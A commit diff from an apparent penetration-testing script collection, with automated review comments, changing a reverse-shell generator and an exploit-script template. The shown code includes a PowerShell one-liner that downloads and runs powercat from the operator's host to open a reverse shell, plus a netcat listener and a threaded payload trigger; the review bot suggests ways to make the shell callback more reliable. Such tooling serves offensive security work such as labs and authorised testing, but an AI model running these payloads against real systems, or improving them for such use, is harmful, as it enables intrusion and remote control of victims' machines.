Roman Hergenreder 2 years ago
parent
commit
1891efe2e4
2 changed files with 16 additions and 7 deletions
  1. 7 1
      genRevShell.py
  2. 9 6
      template.py

+ 7 - 1
genRevShell.py

@@ -4,6 +4,8 @@ import socket
 import sys
 import pty
 import util
+import time
+import threading
 
 def generatePayload(type, local_address, port):
 
@@ -29,7 +31,11 @@ def generatePayload(type, local_address, port):
         return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
 
 def triggerShell(func, port):
-    func()
+    def _wait_and_exec():
+        time.sleep(1.5)
+        func()
+
+    threading.Thread(target=_wait_and_exec).start()
     pty.spawn(["nc", "-lvvp", str(port)])
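Review bot: The fixed `time.sleep(1.5)` in `_wait_and_exec` only guesses how fast `nc` gets to listening, and nothing checks that the bind succeeded — if the port is already taken, nc exits immediately but the payload still fires 1.5 s later and the callback is lost. Binding a throwaway socket to the port before spawning the listener fails early in that case, and `daemon=True` on the thread keeps the process from hanging on the helper if `pty.spawn` raises. `func()` now runs on a thread, so an exception there is only printed by the threading machinery and never reaches the caller; a `try/except` with a visible message makes a failed trigger obvious. The delay itself stays a heuristic.
```python
def triggerShell(func, port):
    # Fail early if the port is taken; a bind failure inside nc would
    # otherwise go unnoticed and the payload would fire against nothing.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
        probe.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        probe.bind(("", port))

    def _wait_and_exec():
        time.sleep(1.5)  # heuristic: give nc time to start listening
        try:
            func()
        except Exception as e:
            print("payload trigger failed: %s" % e, file=sys.stderr)

    threading.Thread(target=_wait_and_exec, daemon=True).start()
    pty.spawn(["nc", "-lvvp", str(port)])
```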
 
 

+ 9 - 6
template.py

@@ -5,21 +5,23 @@ import sys
 def generateTemplate(baseUrl):
     template = """#!/usr/bin/env python
 
-import requests
-import base64
+import sys
 import json
+import base64
+import requests
 from bs4 import BeautifulSoup
 from hackingscripts import util, fileserver
+
 from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
-BASE_URL = "%s"
+BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
 
 def login(username, password):
     # Template method to create a session
     session = requests.Session()
     post_data = { "username": username, "password": password }
-    res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
+    res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
     if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
         print("Login failed")
         exit()
@@ -29,8 +31,9 @@ def exploit(session, payload):
     # Template method to exploit an endpoint
     pass
 
-session = login()
-exploit(session, "id")
+if __name__ == "__main__":
+    session = login()
+    exploit(session, "id")
 """ % baseUrl
 
     return template
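Review bot: `session = login()` under the new `__main__` guard calls `login(username, password)` with no arguments, so every generated script raises `TypeError` before it does anything; the template should ship a visible placeholder such as `session = login("admin", "admin")  # TODO: target credentials`, or give both parameters defaults. While touching the template, the failure path uses the site builtin `exit()`; with `sys` now imported, `sys.exit(1)` returns a non-zero status and does not depend on `site` being loaded. Note also that `baseUrl` is spliced into the generated source by `%s` unescaped, so a URL containing a double quote or backslash yields a syntactically broken script — pre-existing, but the new conditional on the `BASE_URL` line makes that more likely to be overlooked.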